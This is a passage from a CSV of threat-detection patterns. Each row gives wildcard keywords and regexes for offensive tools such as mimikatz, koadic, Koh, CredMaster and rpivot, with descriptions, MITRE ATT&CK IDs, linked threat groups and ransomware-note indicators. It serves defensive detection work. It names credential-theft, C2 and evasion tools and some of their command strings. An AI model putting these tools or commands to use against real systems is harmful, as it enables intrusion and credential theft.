- APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50517" "*klezVirus/CheeseTools*",".{0,1000}klezVirus\/CheeseTools.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","50518" "*klezVirus/inceptor*",".{0,1000}klezVirus\/inceptor.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","50519" "*klezVirus/SilentMoonwalk*",".{0,1000}klezVirus\/SilentMoonwalk.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","50520" "*klsecservices/rpivot*",".{0,1000}klsecservices\/rpivot.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","50522" "*kmahyyg/mremoteng-decrypt*",".{0,1000}kmahyyg\/mremoteng\-decrypt.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","50523" "*knavesec/CredMaster*",".{0,1000}knavesec\/CredMaster.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","50525" "*kncchdigobghenbbaddojjnnaogfppfj*",".{0,1000}kncchdigobghenbbaddojjnnaogfppfj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50526" "*knight3xppu263m7g4ag3xlit2qxpryjwueobh7vjdc3zrscqlfu3pqd.onion*",".{0,1000}knight3xppu263m7g4ag3xlit2qxpryjwueobh7vjdc3zrscqlfu3pqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection 
patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50527" "*known_hosts2john.py*",".{0,1000}known_hosts2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50529" "*knowsmore --create-db*",".{0,1000}knowsmore\s\-\-create\-db.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","50530" "*Koadic.persist*",".{0,1000}Koadic\.persist.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50531" "*koadic_load.*",".{0,1000}koadic_load\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50532" "*koadic_net.*",".{0,1000}koadic_net\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50533" "*koadic_process.*",".{0,1000}koadic_process\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50534" "*koadic_types.*",".{0,1000}koadic_types\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50535" "*koadic_util.*",".{0,1000}koadic_util\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50536" "*KobieBoho@protonmail.com*",".{0,1000}KobieBoho\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50537" "*koh filter add SID*",".{0,1000}koh\sfilter\sadd\sSID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50538" "*koh filter list*",".{0,1000}koh\sfilter\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50539" "*koh filter remove SID*",".{0,1000}koh\sfilter\sremove\sSID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50540" "*koh filter reset*",".{0,1000}koh\sfilter\sreset.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - 
Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50541" "*koh groups LUID*",".{0,1000}koh\sgroups\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50542" "*koh impersonate LUID*",".{0,1000}koh\simpersonate\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50543" "*koh release 
all*",".{0,1000}koh\srelease\sall.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50544" "*koh release LUID*",".{0,1000}koh\srelease\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon 
session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50545" "*Koh.exe capture*",".{0,1000}Koh\.exe\scapture.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 